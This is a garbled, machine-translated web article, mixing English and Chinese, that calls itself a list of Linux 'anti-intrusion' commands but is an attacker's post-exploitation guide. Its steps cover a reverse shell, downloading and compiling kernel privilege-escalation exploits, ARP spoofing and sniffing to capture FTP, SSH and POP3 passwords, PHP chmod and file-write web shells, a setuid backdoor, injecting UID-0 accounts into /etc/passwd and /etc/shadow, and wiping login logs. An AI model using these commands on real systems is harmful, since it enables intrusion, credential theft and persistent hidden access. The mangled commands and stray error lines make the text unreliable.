Shulou(Shulou.com)06/01 Report--

This article to share with you is about what anti-intrusion commands in Linux, Xiaobian feel quite practical, so share to everyone to learn, I hope you can gain something after reading this article, not much to say, follow Xiaobian to see it.

Linux is a free-to-use and freely distributed UNIX-like operating system, is a POSIX-based multi-user, multitasking, multi-threaded and multi-CPU operating system, using Linux to run major Unix tools, applications and network protocols.

1, linux think first cross site

shell browse target station no, command line input:

ls -la /www.users/

2. Overflow lifting

# python -c 'impotr pty;pty.spawn("/bin/sh");

To get interactive Shell, most systems install python by default

input id

bash-3.2$ id

uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)

bash-3.2$

Here uid=529(zeicom) is not root permission,

Enter uname -r

Return: 2.6.18-164.11.1.el5PAE

Linux lifting can be roughly divided into third-party software vulnerabilities, native trust features, and kernel overflows.

Find the corresponding exp, here address finishing is very complete can be here under

http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://www.exploit-db.com/search/

Command type pwd, this command is to display the current directory,

Let's see if we can compile gcc-help.

The current directory is the directory of the shell. I uploaded 2.c in the shell.

Bounce shell to port 12345 of your own machine

Local monitoring on external network server nc -lvvp 12345

You can usually get an apache interactive shell, but sometimes you can't.

this time

# python -c 'impotr pty;pty.spawn("/bin/sh");' cd /tmp Go to tmp directory mkdir Papers Create a directory of Papers Papers Inconspicuous cd Papers Go to Papers directory pwd View current directory and then type wget Download exp gcc -o 2 2.c //Compile 2.c to executable file g++ keio.cc-o keio chmod +x 2 //Give 2 execute permissions./ 2 //execute 2, overflow gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

To determine arpsniffer.c you need to install pcap and libnet first.

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz? modtime=1072656000&big_mirror=0 tar zxvf libpcap-0.8.1.tar.gz cd libpcap-0.8.1 ./ configure make make install

recompile arpsniffer.c

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

This time there was no error, the compilation was successful.

./ arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

Here's how to start spoofing. Since it's server side, we spoof gateway: (network environment is as follows, mail server ip: 192.168.0.11 gateway: 192.168.0.1 local: 192.168.0.77)

./ arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Use tcpdump to listen in another login

tcpdump -i eth0 host 192.168.0.11

Found data, save the monitored data in the file:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Stop after 10 minutes, download pop.txt locally with sz command under SecureCRT, and parse with Ethereal.

Now we can use linsniffer to listen for the username and password we want.

First modify linsniffer.c: Listen for the corresponding application password according to your own needs. Mine is as follows:

if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==80) p=1; /* http */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ [root@bbs111 root]# gcc -o linsniffer linsniffer.c In file included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!

Regardless of the warning, just run the compiled linsniffer.

[root@bbs111 root]# ./ linsniffer

The username and password are automatically saved to tcp.Log.

3. Use cross-site code

Linux does not mention the right to cross-directory access code

Linux permissions set more loose in fact, but some virtual machines or not cross-directory access.

In case you can't lift the right, try the following code. If we're lucky, we might cross it.

The code is as follows:

$path = stripslashes($_GET['path']); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permission editable file or directory. Permission to write; ?>

Save the above code as tmdsb.PHP

Then visit www.tmdsb.com/tmdsb.php? path=../../ The requested URL/index.php was not found on this server.

Here index.PHP is the file to modify permissions.

Another exp collected:

Save the following code as exp.PHP

Code:

@$filename = stripslashes($_POST['filename']); @$mess = stripslashes($_POST['mess']); $fp = @fopen({$_POST['filename']}, 'a'); @fputs($fp,$mess ); @fclose($fp); ?>

4.2.618 The Final Linux Kernel

< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功 udev提权 换了个udev提权，适用于内核范围为2.6.*。 还是上传文件至服务器shell所在目录，执行命令ls，发现文件已经躺在那里面了，之后赋予exp执行权限。 chmod +x pwnkernel.c chmod +x wunderbar_emporium.sh chmod +x exploit.c 之后执行溢出./w* 成功溢出，root权限。 之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。（useradd -u 0 -o "username"） 依次输入命令 cd /tmp sh-3.1# ls /lib/ld-linux* /lib/ld-linux.so.2 sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven sh-3.1# ls -l .str1ven -rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven sh-3.1# chmod +s .str1ven sh-3.1# ls -l .str1ven -rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven 成功建立一个后门，退出root，执行./.str1ven `which whoami`，又成功获取root权限~~ cat /etc/passwd 查看linux用户 cat /etc/shadow 查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 ifconfig 查看本机ip信息 cat /etc/resolv.conf 查看DNS信息 bash -i 在反弹的shell中使用可以直观显示命令 bash prompt: 当你以普通限权用户身份进入的时候，一般你会有一个类似bash$的prompt。当你以 Root登陆时，你的prompt会变成bash#。 系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。 echo 1>

The requested URL/proc/sys/net/ipv4/was not found on this server.

The requested URL/proc/sys/net/ipv4/ip_forward was not found on this server.

netstat -an |grep LISTEN |grep :80 View port

service --status-all | grep running service --status-all | grep http

View Operational Services

lsb_release -a View system version

Restart the SSH service:

/usr/sbin/sshd stop/ usr/sbin/sshd start ssd_config file PasswordAuthentication no,

change it to

PasswordAuthentication yes

Remote SSH is required to log in.

Access denied.

Usepam yes may be used to establish pam login, such as from other linux hosts ssh to the server, if closed, it cannot be opened.

The rookie use of su

chomod 777 /etc/passwd

Then modify bin user's gid and uid to 0

Then passwd sets bin's password

Then cp /bin/bash /sbin/nologin

Then su - bin can go to rootshell when su.

This principle is when ssh does not allow root to log in with ssh terminal, we do not know the root password is a very rookie approach.

can also be

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd gcc prtcl2.c -o local -static -Wall echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

The requested URL/dev/null /var/log/wtmp was not found on this server.

-----

dd if=/dev/zero of=yourfile bs=10M count=10 Create a large file of 100m using Linux Kernel

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.